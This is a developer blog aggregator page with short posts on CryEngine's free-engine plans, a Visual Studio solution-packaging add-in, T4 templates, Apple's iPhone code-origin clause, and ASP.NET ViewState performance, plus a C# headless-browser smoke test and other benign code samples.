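using com.gargoylesoftware.htmlunit;
using com.gargoylesoftware.htmlunit.html;

class HeadlessSmokeTest
{
    static void Main()
    {
        var webClient = new WebClient();                                   // the simulated browser
        var page = (HtmlPage)webClient.getPage("http://localhost:8080/");  // placeholder URL

        System.Console.WriteLine("Title: " + page.getTitleText());

        // Follow a link and inspect the resulting page, all without a real browser.
        var link = page.getAnchorByText("Log in");                         // placeholder link text
        var nextPage = (HtmlPage)link.click();
        System.Console.WriteLine("Navigated to: " + nextPage.getUrl());
    }
}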
Free-to-use CryEngine plans emerge
Posted by
jasper22
at
10:50
|
Crytek wants to release a standalone, free platform that will be ‘up to speed’ with CE3.
Frankfurt-headquartered Crytek may be about to compete with both Unity and Epic Games on the emerging battleground of free-to-use engines. The global indie outfit told Develop that it wants to release a standalone free engine “that will be up to speed” with the CryEngine 3 platform. Unreal vendor Epic Games and Unity have both seen their user-bases mushroom overnight since launching versions of their own engines that, while tied to different royalty rates, are completely free to download and operate. Now the CryEngine 3 group has revealed it wants to tap into this thriving market.
The firm’s CEO Cevat Yerli told Develop that Crytek already gives away a CryEngine 2 editor to the mod community, but explained that Crytek’s expansion strategy stretches beyond. “We have a very vivid community of users and modders and content creators, and usually that’s a great way of unlocking the engine,” he said. “That being said, it’s not the same as what Epic or Unity are currently doing, but we are now pushing harder on this area. We did it before already, but we haven’t pushed it that far yet.” Read more: Develop
The firm’s CEO Cevat Yerli told Develop that Crytek already gives away a CryEngine 2 editor to the mod community, but explained that Crytek’s expansion strategy stretches beyond. “We have a very vivid community of users and modders and content creators, and usually that’s a great way of unlocking the engine,” he said. “That being said, it’s not the same as what Epic or Unity are currently doing, but we are now pushing harder on this area. We did it before already, but we haven’t pushed it that far yet.” Read more: Develop
Project Packager Add-In for Visual Studio 2010
Posted by
jasper22
at
10:49
|
This Add-In for Visual Studio 2010 will package up your solution (actually, any folder you choose) into a zip file, excluding any files with extensions you specify and any folders whose names you specify. I can't upload MSI files to this blog, so in order to install you will need to build the project. I packaged up the Add-In solution using the Add-In itself and uploaded it here.
1. Download the solution, open with Visual Studio 2010 and Build All.
2. Right click the setup project and select Install.
3. Close Visual Studio 2010 and restart.
4. In the Tools menu item –> Add-in Manager, click the PackagerAddIn check box.
To use the Add-In, go to Tools –> PackagerAddIn
Motivation
After completing a project, either as a demo in class or for a customer, I often need to zip up a solution and send it by email or store it somewhere. But even simple projects with Visual Studio 2010 create many binary files that increase the size of the package and contribute nothing to the recipient. Moreover, the baggage, once delivered, is usually never deleted for fear that it is essential to the solution. Once added to the source code control system it will slow down every check out and build for life. It also makes the project unnecessarily daunting for less experienced developers to learn. I have tried using "Clean Solution" from the Build menu to remove the baggage, and, yes, it kinda works. But it is not quite as flexible as I need. For instance, though you can configure which file extensions will be deleted, you can't configure it to delete folders, even if they are empty after the clean. "Clean Solution" also won't zip up the solution for you when you are done. Rather than delete the files myself, and run the risk of deleting something important, I would like to copy all the important files without the baggage to a separate location, then zip up that folder and then delete the folder. This way, even if I forget an important file in the process, the original still exists and can be added. Read more: David Sackstein's Blog
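To make the copy-then-zip approach concrete, here is a rough C# sketch of my own (not the add-in's source): copy the solution to a temporary folder while skipping unwanted extensions and folders, zip the copy, then delete the temporary folder. The skip lists and paths are placeholders, and ZipFile requires .NET 4.5 or later.

using System;
using System.IO;
using System.IO.Compression;   // ZipFile (reference System.IO.Compression.FileSystem)
using System.Linq;

class SolutionPackager
{
    static readonly string[] SkipExtensions = { ".pdb", ".suo", ".user", ".cache" };  // placeholders
    static readonly string[] SkipFolders    = { "bin", "obj", "TestResults" };        // placeholders

    static void Package(string solutionDir, string zipPath)
    {
        string temp = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());

        foreach (string file in Directory.EnumerateFiles(solutionDir, "*", SearchOption.AllDirectories))
        {
            string relative = file.Substring(solutionDir.Length).TrimStart(Path.DirectorySeparatorChar);
            bool inSkippedFolder = relative.Split(Path.DirectorySeparatorChar)
                .Any(part => SkipFolders.Contains(part, StringComparer.OrdinalIgnoreCase));
            bool skippedExtension = SkipExtensions.Contains(Path.GetExtension(file), StringComparer.OrdinalIgnoreCase);
            if (inSkippedFolder || skippedExtension) continue;

            string dest = Path.Combine(temp, relative);
            Directory.CreateDirectory(Path.GetDirectoryName(dest));
            File.Copy(file, dest);                      // originals are never touched
        }

        ZipFile.CreateFromDirectory(temp, zipPath);     // zip the cleaned copy
        Directory.Delete(temp, true);                   // then throw the copy away
    }

    static void Main()
    {
        Package(@"C:\work\MySolution", @"C:\work\MySolution.zip");  // placeholder paths
    }
}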
More T4
Posted by
jasper22
at
10:48
|
T4 (Text Template Transformation Toolkit) is a code generator integrated into Visual Studio. Hmmm, CodeSmith? ;-)
Creating and editing a T4 Template
Steps
* Add a Text File
* Rename with a .tt extension
* Write T4 template header configuration and template code
<#@ template language="C#v3.5" #>
<#@ import namespace = "System.Text.RegularExpressions" #>
<#@ output extension=".cs" #> <#
string lTitle = "MyHelloWorldClass";
#>
namespace MyProject.Test
{
public class <#=lTitle #>
{
public <#=lTitle #>()
{
}
}
}
Actually EF (Entity Framework) uses T4 to customize your EF generated classes.
Tools
Tangible Engineering offers a T4 Editor (Free or Pro versions) that integrates into Visual Studio with IntelliSense. Read more: Refact your C# Code
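For reference, saving the template above with a .tt extension should produce generated C# output roughly like this:

namespace MyProject.Test
{
    public class MyHelloWorldClass
    {
        public MyHelloWorldClass()
        {
        }
    }
}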
“Originally Written in…” vs. Code Generation
Posted by
jasper22
at
10:47
|
My assertion that the iPhone license phrase “Applications must be originally written in Objective-C, C, C++, or JavaScript as executed by the iPhone OS WebKit engine” can only mean zero code generation has been questioned. Here’s why I stand by that assessment (and consider the clause beyond the pale). Let me point out that the common-sense reading of that clause is straightforward. The word “originally” clearly implies that writing this:
UIView.BeginAnimations("");
UIView.SetAnimationTransition(UIViewAnimationTransition.FlipFromLeft, this.Superview, true);
UIView.SetAnimationCurve(UIViewAnimationCurve.EaseInOut);
UIView.SetAnimationDuration(1.0);
and transforming it into:
[UIView beginAnimations: nil context:context];
[UIView setAnimationTransition: UIViewAnimationTransitionFlipFromLeft forView: [self superView] cache: YES];
[UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];
[UIView setAnimationDuration: 1.0]
is forbidden. To take it to the extreme, can you imagine betting your company on convincing a jury that writing the first (which is C# and MonoTouch) and generating the second means it was “originally written in Objective C”? If so, you have some hard lessons about the legal system to learn. I should point out that even though this code is clearly very similar, there are some slight differences, such as C#’s enumerated value UIViewAnimationTransition.FlipFromLeft as opposed to Objective C’s constant value UIViewAnimationTransitionFlipFromLeft. The . makes a difference in the parse tree and in the programmer’s mind — a small one, but a helpful one. Read more: Knowing .NET
AWESOMIUM
Posted by
jasper22
at
10:46
|
* A framework for an advanced, 3D web-browser
* Powering a GUI using Web-based content
* The implementation of in-game advertising.
Read more: Khrona
My Visual Studio Theme for Windows 7
Posted by
jasper22
at
10:43
|
This is a simple Visual Studio theme I put together for Windows 7 on my laptop. Enjoy! Read more: Rob Caron
How I made our websites run 10 times faster
Posted by
jasper22
at
10:42
|
For a very long time our websites have been very sluggish. There are several reasons for this, some obvious, while others not so obvious. Here I will explain to you how we made our websites perform at lightning speed!
How I made our websites run 10 times faster
The first thing you have to realize when working with a website project, which isn't merely HTML documents offered from some server somewhere, is that although YSlow is a very good product, the assumption that most of your website speed is in the client layer just isn't true. YSlow is a *KICK-ASS* product, so start out with YSlow, but once you have gone through the issues you can fix that YSlow shows you, please do not stop there...! If you have any kind of complex server back-end, you will have to move on further and also optimize your server back-end...
What we did...
First of all I started out with figuring out how to reduce the impact of the ViewState. The ViewState has a very bad reputation, and to be quite frank, most of its bad reputation is not justified. The ViewState is a really beautiful thing, and if you're going to develop any kind of complex application or website, you will have to use either some mechanism similar to the ViewState, or the ViewState itself. Though when you couple the ViewState with a Modularized Framework like Ra-Brix, the ViewState problems accumulate. Since all our websites are built on Ra-Brix, we had to do something about it. A couple of weeks ago I wrote a pretty detailed blog post about how we fixed our ViewState problems in Ra-Brix. To summarize; we saved it on the server... Read more: Ra-Ajax
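The general idea of keeping ViewState on the server can be sketched with plain ASP.NET WebForms machinery; this is a hedged illustration of the technique, not Ra-Brix's actual implementation. Overriding PageStatePersister with SessionPageStatePersister stores the page state in session and sends only a small token to the browser, so the hidden __VIEWSTATE field stays tiny.

using System.Web.UI;

public class ProductListPage : Page   // hypothetical page
{
    // Store ViewState/ControlState in session instead of in the page output.
    protected override PageStatePersister PageStatePersister
    {
        get { return new SessionPageStatePersister(this); }
    }
}

The trade-off is server memory and back/refresh behaviour, which is presumably part of what a framework like Ra-Brix has to manage for you.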